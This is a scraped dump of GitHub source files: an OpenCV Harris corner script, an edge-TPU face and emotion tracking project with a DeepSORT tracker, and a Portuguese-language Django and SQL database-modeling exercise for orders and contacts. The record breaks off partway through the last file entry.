"path": "/TempleLayout_Analyzer/HarrisCornerDetect1.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 8 15:48:40 2019\r\n\r\n@author: Alex\r\n\"\"\"\r\n\r\nimport cv2\r\nimport numpy as np\r\n\r\nfilename = 'Temple.png'\r\nimg = cv2.imread(filename)\r\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n\r\ngray = np.float32(gray)\r\ndst = cv2.cornerHarris(gray, 2, 3, 0.04)\r\n\r\n#Dilates the markers\r\ndst = cv2.dilate(dst, None)\r\n\r\nimg[dst>0.01*dst.max()]=[0, 0, 255]\r\n\r\n#img[dst(1)>0.01*dst.max()]=[255, 0, 0]\r\n\r\n\r\n#cv2.imshow('dst', img)\r\n#if cv2.waitKey(0) & 0xff == 27:\r\n# cv2.destroyAllWindows()\r\nflag = False \r\n#colSums = []\r\n#rowSums = []\r\nrowLength = 0\r\ncolLength = 0\r\n#for y in range(len(dst)):\r\n #rowSums.append(sum(dst[y]))\r\n #for x in range(len(dst[y])):\r\n #if dst[y, x] > 0:\r\n \r\n# #img[y, x]= [255, 0, 0]\r\n# cv2.circle(img, (x,y), 40, (255, 0, 0), 5)\r\n# print(x, y)\r\n# flag = True\r\n# break\r\n# if flag: \r\n# break\r\nTempleWidth = []\r\nfor y in range(len(dst)):\r\n TempleWidths=[]\r\n for x in range(len(dst)):\r\n if dst[y, x] > 0:\r\n TempleWidths.append(dst[y, x])\r\n TempleWidth.append(int(len(TempleWidths())))\r\n \r\nprint(rowLength)\r\ncv2.imwrite('output.jpg', img) "
}
] | 23 |
tennisonliu/TensorflowDeepSortTracking | https://github.com/tennisonliu/TensorflowDeepSortTracking | 6713d20ac7f4727a16d3edd528cc5c099c617a39 | 38f9e652033a5c886b9910235807aefb5b9cd3e2 | d9d8f580b5429f21981fb6d456bd8ab63ead679b | refs/heads/master | 2020-07-30T12:36:30.748721 | 2019-09-30T03:53:34 | 2019-09-30T03:53:34 | 210,237,081 | 0 | 0 | null | 2019-09-23T01:05:25 | 2019-09-14T11:54:23 | 2019-09-07T19:58:34 | null | [
{
"alpha_fraction": 0.6294201016426086,
"alphanum_fraction": 0.6379066705703735,
"avg_line_length": 33.5,
"blob_id": "149e1bab4c197fd5e6e78949f123c20be9c3e306",
"content_id": "b5cf98fd728b77238f5eff24c373fd7b62d79530",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 707,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 20,
"path": "/threads/ImageInput/CsiThread.py",
"repo_name": "tennisonliu/TensorflowDeepSortTracking",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport cv2\nfrom threads.ImageInput.AbstractImageInputThread \\ \n import AbstractImageInputThread\n\nclass CsiThread(AbstractImageInputThread):\n def __init__(self, name, gstreamer_init):\n super().init(name, IMAGE_WIDTH, IMAGE_HEIGHT)\n self.cap = self.init_input(IMAGE_WIDTH, IMAGE_HEIGHT, gstreamer_init)\n \n def init_input(self, IMAGE_WIDTH, IMAGE_HEIGHT, gstreamer_init):\n cap = cv2.VideoCapture(gstreamer_init, cv2.CAP_GSTREAMER)\n assert cap.isOPened(), 'Could not open CSI Camera.'\n cap.set(3, IMAGE_WIDTH)\n cap.set(4, IMAGE_HEIGHT)\n \n def stop(self):\n super().stop()\n self.cap.release()\n \n "
},
{
"alpha_fraction": 0.6061336398124695,
"alphanum_fraction": 0.6170865297317505,
"avg_line_length": 35.52000045776367,
"blob_id": "ce20a665fb32b8fcca0b5895dd0e5881a413f1b8",
"content_id": "9c21cdb193cd2d90832ddff1720713f3bed6b8a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4565,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 125,
"path": "/main.py",
"repo_name": "tennisonliu/TensorflowDeepSortTracking",
"src_encoding": "UTF-8",
"text": "from ObjectTracking.deep_sort_tracker import DeepSortTracker\nfrom threads.ImageInput.WebcamThread import UsbThread\nfrom threads.ImageInput.VideoThread import VideoThread\nfrom threads.Predictor.PredictorImage import PredictorImage\nimport cv2\nimport warnings\nfrom utilities import constants\nfrom utilities import helper\nimport argparse\nfrom edgetpu.detection.engine import DetectionEngine\nfrom PIL import Image\nfrom keras.preprocessing.image import img_to_array\nfrom keras.models import load_model\nfrom keras.utils.data_utils import get_file\nimport numpy as np\nimport json\nwarnings.filterwarnings('ignore')\n\n'''\nWEBCAM_INPUT = 'cam'\ndef init(inputSrc):\n if inputSrc == WEBCAM_INPUT:\n # Run the webcam thread\n thread_image = WebcamThread('Webcam Thread', 1)\n else:\n thread_image = VideoThread('Video Thread', inputSrc, FPS=25.0)\n\n thread_image.start()\n image_data = thread_image.image_data\n # Run the COCO Model\n thread_coco = PredictorImage('coco',\n constants.CKPT_COCO,\n constants.LABELS_COCO,\n image_data,\n score_thresh=0.5,\n WITH_TRACKER=False)\n thread_coco.start()\n thread_coco.continue_predictor()\n # Initialize the Tracker\n tracker = DeepSortTracker()\n return tracker, thread_coco, thread_image\n'''\n\ndef gstreamer_pipeline(capture_width = 1280, capture_heights = 720, display_width = 1280,\n display_height = 720, framerate = 20, flip_method=0):\n return('nvarguscamerasrc ! '\n 'video/x-raw(memory:NVMM), '\n 'width=(int)%d, height=(int)%d, '\n 'format=(string)NV12, framerate=(fraction)%d/1 ! '\n 'nvvidconv flip-method=%d ! '\n 'video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx ! '\n 'videoconvert ! '\n 'video/x-raw, format=(string)BGR ! appsink' %\n (capture_width, capture_height, framerate, flip_method, display_width, display_height))\n\n\ndef init(input_src, faceModel, emotionModel):\n # initiate camera feed\n if input_src == 'csi':\n stream_thread = CsiThread('Csi Thread', gstreamer_pipeline())\n if input_src == 'usb':\n stream_thread = UsbThread('USB Thread', 0)\n \n stream_thread.start()\n \n # initialise models\n faceEngine = DetectionEngine(faceModel)\n global emotionList \n emotionList = ['angry', 'disgust', 'scared', 'happy', 'sad', 'surprised', 'neutral']\n emotionNet = load_model(emotionModel, compile = False)\n \n # initialise tracker\n tracker = DeepSortTracker()\n return stream_thread, faceEngine, emotionNet, tracker\n\n'''\ndef main(cap, faceEngine, emotionNet, tracker):\n frameName = 'Main Frame'\n print('Running a Tensorflow model with the DeepSORT Tracker')\n # Run the main loop\n while True:\n # Grab the image and convert from RGB -> BGR\n image_np = thread_image.image_data.image_np.copy()[:, :, ::-1]\n output_data = thread_coco.output_data\n output_data = tracker.run(output_data, image_np)\n image_np = helper.drawDetectedBBs(image_np.copy(),\n output_data,\n score_thresh=0.1)\n\n cv2.imshow(frameName, image_np)\n key = cv2.waitKey(10)\n if key == ord('q'):\n break\n cv2.destroyAllWindows()\n'''\n\ndef main(stream, faceEngine, emotionNet, tracker):\n frameName = 'Main Frame'\n print('Running a Tensorflow model with the DeepSORT Tracker')\n # Run the main loop\n while True:\n frame = stream.image_data\n # frame = stream.image_data.image_np.copy()[:, :, ::-1]\n \n frame_pil = Image.fromarray(frame)\n faces = engine.DetectWithImage(frame_pil, threshold=0.05, \n keep_aspect_ratio=False, relative_coord=False,\n top_k=10)\n image_np = helper.drawDetectedBBs(frame_pil.copy(), faces, score_thres=0.1)\n \n cv2.imshow(frameName, image_np)\n key = cv2.waitKey(1)\n if key == ord('q'):\n break\n\n cv2.destroyAllWindows()\n\n\nif __name__ == \"__main__\":\n faceModel = './deploy_model/mobilenet_ssd_v2_face_quant_postprocess_edgetpu.tflite'\n emotionModel = './deploy_model/emotion_net.hdf5'\n input_src = 'csi'\n \n stream, faceEngine, emotionNet, tracker = init(input_src, faceModel, emotionModel)\n main(stream, faceEngine, emotionNet, tracker)\n"
},
{
"alpha_fraction": 0.8116196990013123,
"alphanum_fraction": 0.8169013857841492,
"avg_line_length": 62,
"blob_id": "599cc975e6f0542c8f13bebd0e06e46cf02d415d",
"content_id": "ec9a2b27ab965f2f9e606bde95e78b1861b80bb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 568,
"license_type": "no_license",
"max_line_length": 423,
"num_lines": 9,
"path": "/.spyproject/workspace.ini",
"repo_name": "tennisonliu/TensorflowDeepSortTracking",
"src_encoding": "UTF-8",
"text": "[workspace]\nrestore_data_on_startup = True\nsave_data_on_exit = True\nsave_history = True\nsave_non_project_files = False\n\n[main]\nversion = 0.1.0\nrecent_files = ['/Users/tennisonliu/Desktop/mam_with_deepsort/TensorflowDeepSortTracking/ObjectTracking/deep_sort/tracker.py', '/Users/tennisonliu/Desktop/mam_with_deepsort/TensorflowDeepSortTracking/main.py', '/Users/tennisonliu/Desktop/mam_with_deepsort/TensorflowDeepSortTracking/threads/ImageInput/CsiThread.py', '/Users/tennisonliu/Desktop/mam_with_deepsort/TensorflowDeepSortTracking/threads/ImageInput/UsbThread.py']\n\n"
}
] | 3 |
rg3915/banco_de_dados | https://github.com/rg3915/banco_de_dados | cfabef8e75b60b5375aad275406c3978cb0f5550 | 9ff659891841c3a40f7a572d1edd83591d9dd335 | 27c29639f1e68687cafaaa3f4c0caf3ced020aeb | refs/heads/master | 2016-09-06T03:37:26.653906 | 2014-09-04T04:37:31 | 2014-09-04T04:37:31 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.730671226978302,
"alphanum_fraction": 0.7383177280426025,
"avg_line_length": 22.540000915527344,
"blob_id": "92fdd6a7283a5df5c135a3d57a8f7974e240a3f1",
"content_id": "4669be792b8cc8c505992a2bf39aa8456924e62a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1178,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 50,
"path": "/pedido/pedido_project/pedido/models.py",
"repo_name": "rg3915/banco_de_dados",
"src_encoding": "UTF-8",
"text": "# encoding: utf-8\nfrom django.db import models\nfrom datetime import date\n\nclass Cliente(models.Model):\n\tnome = models.CharField('Nome', max_length=50)\n\n\tclass Meta:\n\t\tverbose_name=u'cliente'\n\t\tverbose_name_plural=u'clientes'\n\n\tdef __unicode__(self):\n\t\treturn self.nome\n\nclass Categoria(models.Model):\n\tcategoria = models.CharField('Categoria', max_length=50)\n\n\tclass Meta:\n\t\tverbose_name=u'categoria'\n\t\tverbose_name_plural=u'categorias'\n\n\tdef __unicode__(self):\n\t\treturn self.categoria\n\nclass Produto(models.Model):\n\tcategoria = models.ForeignKey(Categoria)\n\tproduto = models.CharField('Produto', max_length=50)\n\tpreco = models.DecimalField('Preço', max_digits=8, decimal_places=2)\n\n\tclass Meta:\n\t\tverbose_name=u'produto'\n\t\tverbose_name_plural=u'produtos'\n\n\tdef __unicode__(self):\n\t\treturn self.produto\n\nclass Pedido(models.Model):\n\tdata_pedido = models.DateField('Data do pedido')\n\tcliente = models.ForeignKey(Cliente)\n\n\tdef __unicode__(self):\n\t\treturn unicode(self.data_pedido)\n\nclass DetPedido(models.Model):\n\tpedido = models.ForeignKey(Pedido)\n\tproduto = models.ForeignKey(Produto)\n\tquantidade = models.IntegerField()\n\n\tdef __unicode__(self):\n\t\treturn unicode(self.pedido)\n"
},
{
"alpha_fraction": 0.6957913041114807,
"alphanum_fraction": 0.7479596734046936,
"avg_line_length": 49.39516067504883,
"blob_id": "89a1ba73abfdb324feee908e050c76cfb16888b6",
"content_id": "a315cadc44b4e6abb72912ca567b65e7570b63a5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 6249,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 124,
"path": "/pedido/modelagem/pedido.sql",
"repo_name": "rg3915/banco_de_dados",
"src_encoding": "UTF-8",
"text": "-- Criando schema\nCREATE SCHEMA pedidos;\nUSE pedidos;\n\n-- Criando as tabelas\nCREATE TABLE clientes (\n\tidCliente INT AUTO_INCREMENT PRIMARY KEY,\n\tnome VARCHAR(50)\n);\nCREATE TABLE categorias (\n\tidCategoria INT AUTO_INCREMENT PRIMARY KEY,\n\tcategoria VARCHAR(50)\n);\nCREATE TABLE produtos (\n\tidProduto INT AUTO_INCREMENT PRIMARY KEY,\n\tproduto VARCHAR(50),\n\tpreco DECIMAL(2),\n\tidCategoria INT,\n\tFOREIGN KEY (idCategoria) REFERENCES categorias(idCategoria)\n);\nCREATE TABLE pedidos (\n\tidPedido INT AUTO_INCREMENT PRIMARY KEY,\n\tdataPedido DATETIME,\n\tidCliente INT,\n\tFOREIGN KEY (idCliente) REFERENCES clientes(idCliente)\n);\nCREATE TABLE detPedidos (\n\tiddetPedido INT AUTO_INCREMENT PRIMARY KEY,\n\tquantidade INT,\n\tidPedido INT,\n\tidProduto INT,\n\tFOREIGN KEY (idPedido) REFERENCES pedidos(idPedido),\n\tFOREIGN KEY (idProduto) REFERENCES produtos(idProduto)\n);\n\n-- Populando clientes\nINSERT INTO clientes (nome) VALUES ('Amanda');\nINSERT INTO clientes (nome) VALUES ('Beatriz');\nINSERT INTO clientes (nome) VALUES ('Carla');\nINSERT INTO clientes (nome) VALUES ('Denise');\nINSERT INTO clientes (nome) VALUES ('Eloisa');\nINSERT INTO clientes (nome) VALUES ('Fernanda');\nINSERT INTO clientes (nome) VALUES ('Gabriela');\nINSERT INTO clientes (nome) VALUES ('Isadora');\nINSERT INTO clientes (nome) VALUES ('Joana');\n\n-- Populando categorias\nINSERT INTO categorias (categoria) VALUES ('Cama Mesa Banho');\nINSERT INTO categorias (categoria) VALUES ('Eletrodomestico');\nINSERT INTO categorias (categoria) VALUES ('Informatica');\nINSERT INTO categorias (categoria) VALUES ('Movel');\nINSERT INTO categorias (categoria) VALUES ('Roupa');\nINSERT INTO categorias (categoria) VALUES ('Som');\nINSERT INTO categorias (categoria) VALUES ('Video');\n\n-- Populando produtos\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (1, 'Toalha de mesa', 45);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (2, 'Geladeira', 1200);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (2, 'Fogao', 600);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (3, 'Notebook', 1200);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (3, 'Tablet', 900);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (3, 'Ultrabook', 2100);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (4, 'Sofa', 1500);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (4, 'Cama', 800);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (4, 'Cadeira', 400);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (4, 'Mesa', 1450);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (5, 'Calca', 59.99);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (5, 'Camisa', 44.99);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (5, 'Blusa', 80.90);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (5, 'Short', 40.50);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (5, 'Meia', 15.25);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (6, 'CD Player', 180);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (6, 'Microsystem', 1350.75);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (7, 'TV', 1459.99);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (7, 'Blue Ray', 724.99);\nINSERT INTO produtos (idCategoria, produto, preco) VALUES (7, 'Home Teather', 1879.99);\n\n-- Populando pedidos\nINSERT INTO pedidos (dataPedido, idCliente) VALUES ('2013-10-01', 1);\nINSERT INTO pedidos (dataPedido, idCliente) VALUES ('2013-10-01', Null);\nINSERT INTO pedidos (dataPedido, idCliente) VALUES ('2013-10-02', 1);\nINSERT INTO pedidos (dataPedido, idCliente) VALUES ('2013-10-02', 2);\nINSERT INTO pedidos (dataPedido, idCliente) VALUES ('2013-10-03', Null);\nINSERT INTO pedidos (dataPedido, idCliente) VALUES ('2013-10-03', 3);\nINSERT INTO pedidos (dataPedido, idCliente) VALUES ('2013-10-04', 3);\nINSERT INTO pedidos (dataPedido, idCliente) VALUES ('2013-10-05', Null);\nINSERT INTO pedidos (dataPedido, idCliente) VALUES ('2013-10-07', Null);\nINSERT INTO pedidos (dataPedido, idCliente) VALUES ('2013-10-08', 4);\nINSERT INTO pedidos (dataPedido, idCliente) VALUES ('2013-10-08', 4);\nINSERT INTO pedidos (dataPedido, idCliente) VALUES ('2013-10-09', Null);\nINSERT INTO pedidos (dataPedido, idCliente) VALUES ('2013-10-09', 5);\nINSERT INTO pedidos (dataPedido, idCliente) VALUES ('2013-10-10', 6);\nINSERT INTO pedidos (dataPedido, idCliente) VALUES ('2013-10-10', 6);\nINSERT INTO pedidos (dataPedido, idCliente) VALUES ('2013-10-10', Null);\n\n\n-- Populando detPedidos\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (1, 1, 16);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (1,2, 20);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (1,3, 12);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (1,3, 11);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (2,2, 1);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (2,1, 5);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (2,5, 3);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (3,10, 2);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (3,20, 8);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (3,15, 9);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (3,15, 12);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (3,12, 20);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (4,13, 22);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (5,14, 17);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (5,7, 19);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (6,7, 4);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (6,7, 6);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (7,8, 3);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (7,9, 5);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (7,10, 2);\nINSERT INTO detPedidos (idPedido, idProduto, quantidade) VALUES (8,12, 1);\n\n-- Mostrando o nome dos clientes que fizeram um pedido\nSELECT DISTINCT nome\nFROM clientes C\nINNER JOIN pedidos P\nON C.idCliente = P.idCliente;\n"
},
{
"alpha_fraction": 0.7906976938247681,
"alphanum_fraction": 0.7965116500854492,
"avg_line_length": 27.83333396911621,
"blob_id": "40d898e97a5ca96dac827c2a10baf912011ab457",
"content_id": "2ab53c90c05b0cb5fec26e33ff1592c3c3722b7a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 173,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 6,
"path": "/pedido/README.md",
"repo_name": "rg3915/banco_de_dados",
"src_encoding": "UTF-8",
"text": "##PEDIDO\n\nExemplo de pedido de compras para teste dos comandos sql.\n\nAgora o pedido faz parte de um projeto django.\nO projeto será feito com sqlite3 para mais simplicidade."
},
{
"alpha_fraction": 0.7422680258750916,
"alphanum_fraction": 0.7437407970428467,
"avg_line_length": 20.21875,
"blob_id": "3e05145f4d4c745da636e3f76fc8b4aaa18649d9",
"content_id": "da8bd1f87b1caf6895f3562f1332f2eb2d9aaaae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 679,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 32,
"path": "/agenda/admin.py",
"repo_name": "rg3915/banco_de_dados",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom django.contrib import admin\nfrom agenda.models import *\n\n\nclass RelacionamentoInline(admin.StackedInline):\n model = Relacionamento\n fk_name = 'contato'\n\n\nclass FoneInline(admin.TabularInline):\n model = Fone\n\n\nclass EnderecoInline(admin.TabularInline):\n model = Endereco\n\n\nclass ContatoTagInline(admin.TabularInline):\n model = ContatoTag\n fk_name = 'contato'\n\n\nclass ContatoAdmin(admin.ModelAdmin):\n inlines = [RelacionamentoInline, FoneInline,\n EnderecoInline, ContatoTagInline]\n\n\nadmin.site.register(Contato, ContatoAdmin)\nadmin.site.register(Endereco)\nadmin.site.register(Relacionamento)\nadmin.site.register(Tag)\n"
},
{
"alpha_fraction": 0.6049270033836365,
"alphanum_fraction": 0.6158758997917175,
"avg_line_length": 28.823129653930664,
"blob_id": "5fdc15f0751d4b5d3c8b9f0747565d9eedf16bb2",
"content_id": "024e970802f81127e03fb519c84aff6b2d9c1e7f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4387,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 147,
"path": "/agenda/models.py",
"repo_name": "rg3915/banco_de_dados",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom django.db import models\n\nCONTATO_TRATAMENTO = (\n ('a', 'Arq.'),\n ('aa', 'Arqa.'),\n ('d', 'Dona'),\n ('dr', 'Dr.'),\n ('dra', 'Dra.'),\n ('e', 'Eng.'),\n ('p', 'Prof.'),\n ('pa', 'Profa.'),\n ('sr', 'Sr.'),\n ('sra', 'Sra.'),\n ('srta', 'Srta.'),\n)\n\nTIPO_CONTATO = (\n ('e', 'empresa'),\n ('p', 'pessoa'),\n ('c', 'colaborador'),\n ('f', u'funcionário'),\n)\n\n\nclass Contato(models.Model):\n confidencial = models.BooleanField(default=True)\n tratamento = models.CharField(\n max_length=4, choices=CONTATO_TRATAMENTO, blank=True)\n nome = models.CharField(max_length=50)\n sobrenome = models.CharField(max_length=50, blank=True)\n nome_fantasia = models.CharField(max_length=50, blank=True)\n razao_social = models.CharField(max_length=50, blank=True)\n tipo_contato = models.CharField(max_length=1, choices=TIPO_CONTATO)\n cargo = models.CharField(max_length=50, blank=True)\n email = models.EmailField()\n cnpj = models.CharField(max_length=13, blank=True)\n ie = models.CharField(max_length=15, blank=True)\n cpf = models.CharField(max_length=11, blank=True)\n rg = models.CharField(max_length=10, blank=True)\n criado_em = models.DateTimeField(auto_now_add=True, auto_now=False)\n modificado_em = models.DateTimeField(auto_now_add=False, auto_now=True)\n relationships = models.ManyToManyField(\n 'self', through='Relacionamento', symmetrical=False, related_name='related_to+')\n\n class Meta:\n ordering = ['criado_em']\n verbose_name = (u'Contato')\n verbose_name_plural = (u'Contatos')\n\n def __unicode__(self):\n return self.nome + \" \" + self.sobrenome\n\n\nclass Relacionamento(models.Model):\n contato = models.ForeignKey('Contato', related_name='contato_de')\n relaciona_com = models.ForeignKey('Contato', related_name='relaciona_com')\n\n class Meta:\n verbose_name = (u'Relacionamento')\n verbose_name_plural = (u'Relacionamentos')\n\n def __unicode__(self):\n return u'%s -> %s' % (self.contato.nome, self.relaciona_com.nome)\n\n def add_relationship(self, person, status, symm=True):\n relationship, created = Relacionamento.objects.get_or_create(\n contato=self,\n relaciona_com=person,\n status=status)\n if symm:\n person.add_relationship(self, status, False)\n return relationship\n\n def remove_relationship(self, person, status, symm=True):\n Relacionamento.objects.filter(\n contato=self,\n relaciona_com=person,\n status=status).delete()\n if symm:\n person.remove_relationship(self, status, False)\n\n def get_relationship(self, status):\n return self.relationships.filter(\n to_people__contato=self)\n\n\nclass ContatoTag(models.Model):\n contato = models.ForeignKey('Contato')\n tag = models.ForeignKey('Tag')\n\n\nclass Tag(models.Model):\n tag = models.CharField(max_length=100)\n\n class Meta:\n verbose_name = (u'tag')\n verbose_name_plural = (u'tags')\n\n def __unicode__(self):\n return self.tag\n\nTIPO_ENDERECO = (\n ('i', 'indefinido'),\n ('c', 'comercial'),\n ('r', 'residencial'),\n ('o', 'outros'),\n)\n\n\nclass Endereco(models.Model):\n contato = models.ForeignKey('Contato')\n tipo_endereco = models.CharField(max_length=1, choices=TIPO_ENDERECO)\n logradouro = models.CharField(max_length=200)\n complemento = models.CharField(max_length=100, blank=True)\n bairro = models.CharField(max_length=100, blank=True)\n cidade = models.CharField(max_length=100, blank=True)\n uf = models.CharField(max_length=100, blank=True)\n pais = models.CharField(max_length=100, blank=True)\n cep = models.CharField(max_length=50, blank=True)\n\n class Meta:\n verbose_name = (u'endereço')\n verbose_name_plural = (u'endereços')\n\n def __unicode__(self):\n return self.logradouro\n\nTIPO_FONE = (\n ('pri', 'principal'),\n ('com', 'comercial'),\n ('res', 'residencial'),\n ('cel', 'celular'),\n ('cl', 'Claro'),\n ('oi', 'Oi'),\n ('t', 'Tim'),\n ('v', 'Vivo'),\n ('n', 'Nextel'),\n ('fax', 'fax'),\n ('o', 'outros'),\n)\n\n\nclass Fone(models.Model):\n contato = models.ForeignKey('Contato')\n fone = models.CharField(max_length=50)\n tipo_fone = models.CharField(max_length=3, choices=TIPO_FONE)\n"
},
{
"alpha_fraction": 0.7319587469100952,
"alphanum_fraction": 0.7319587469100952,
"avg_line_length": 23.375,
"blob_id": "51c1a66cfa05b84d8e0169fd8a2e5ff28fe8dc8c",
"content_id": "6e6f59f1e337ecc241aff6ccf20e6baf43b7c14f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 196,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 8,
"path": "/README.md",
"repo_name": "rg3915/banco_de_dados",
"src_encoding": "UTF-8",
"text": "banco_de_dados\n==============\n\nModelagem de dados e testes em SGBD.\n\n# Objetivo\n\nO objetivo deste projeto é fazer algumas modelagens de banco de dados, além de experimentar e testar alguns SGBD."
},
{
"alpha_fraction": 0.6316685676574707,
"alphanum_fraction": 0.6594778895378113,
"avg_line_length": 34.2400016784668,
"blob_id": "92d8fd188f09e7ddb4e059414edda7347eeade69",
"content_id": "678421d11751a8a86c3cff5c736ed477fc132413",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 1762,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 50,
"path": "/agenda/agenda.sql",
"repo_name": "rg3915/banco_de_dados",
"src_encoding": "UTF-8",
"text": "CREATE TABLE \"agenda_contato\" (\n \"id\" integer NOT NULL PRIMARY KEY,\n \"confidencial\" boolean NOT NULL,\n \"tratamento\" varchar(4) NOT NULL,\n \"nome\" varchar(50) NOT NULL,\n \"sobrenome\" varchar(50) NOT NULL,\n \"nome_fantasia\" varchar(50) NOT NULL,\n \"razao_social\" varchar(50) NOT NULL,\n \"tipo_contato\" varchar(1) NOT NULL,\n \"cargo\" varchar(50) NOT NULL,\n \"email\" varchar(75) NOT NULL,\n \"cnpj\" varchar(13) NOT NULL,\n \"ie\" varchar(15) NOT NULL,\n \"cpf\" varchar(11) NOT NULL,\n \"rg\" varchar(10) NOT NULL,\n \"criado_em\" datetime NOT NULL,\n \"modificado_em\" datetime NOT NULL\n);\nCREATE TABLE \"agenda_relacionamento\" (\n \"id\" integer NOT NULL PRIMARY KEY,\n \"contato_id\" integer NOT NULL REFERENCES \"agenda_contato\" (\"id\"),\n \"relaciona_com_id\" integer NOT NULL REFERENCES \"agenda_contato\" (\"id\")\n);\nCREATE TABLE \"agenda_contatotag\" (\n \"id\" integer NOT NULL PRIMARY KEY,\n \"contato_id\" integer NOT NULL REFERENCES \"agenda_contato\" (\"id\"),\n \"tag_id\" integer NOT NULL\n);\nCREATE TABLE \"agenda_tag\" (\n \"id\" integer NOT NULL PRIMARY KEY,\n \"tag\" varchar(100) NOT NULL\n);\nCREATE TABLE \"agenda_endereco\" (\n \"id\" integer NOT NULL PRIMARY KEY,\n \"contato_id\" integer NOT NULL REFERENCES \"agenda_contato\" (\"id\"),\n \"tipo_endereco\" varchar(1) NOT NULL,\n \"logradouro\" varchar(200) NOT NULL,\n \"complemento\" varchar(100) NOT NULL,\n \"bairro\" varchar(100) NOT NULL,\n \"cidade\" varchar(100) NOT NULL,\n \"uf\" varchar(100) NOT NULL,\n \"pais\" varchar(100) NOT NULL,\n \"cep\" varchar(50) NOT NULL\n);\nCREATE TABLE \"agenda_fone\" (\n \"id\" integer NOT NULL PRIMARY KEY,\n \"contato_id\" integer NOT NULL REFERENCES \"agenda_contato\" (\"id\"),\n \"fone\" varchar(50) NOT NULL,\n \"tipo_fone\" varchar(3) NOT NULL\n);\n"
},
{
"alpha_fraction": 0.7124999761581421,
"alphanum_fraction": 0.7291666865348816,
"avg_line_length": 31.0222225189209,
"blob_id": "828b3b5708e21f830f0cef1722643bffff40f057",
"content_id": "740120b52d36765f7a4ce2e24c87871b5d41810d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1452,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 45,
"path": "/agenda/README.md",
"repo_name": "rg3915/banco_de_dados",
"src_encoding": "UTF-8",
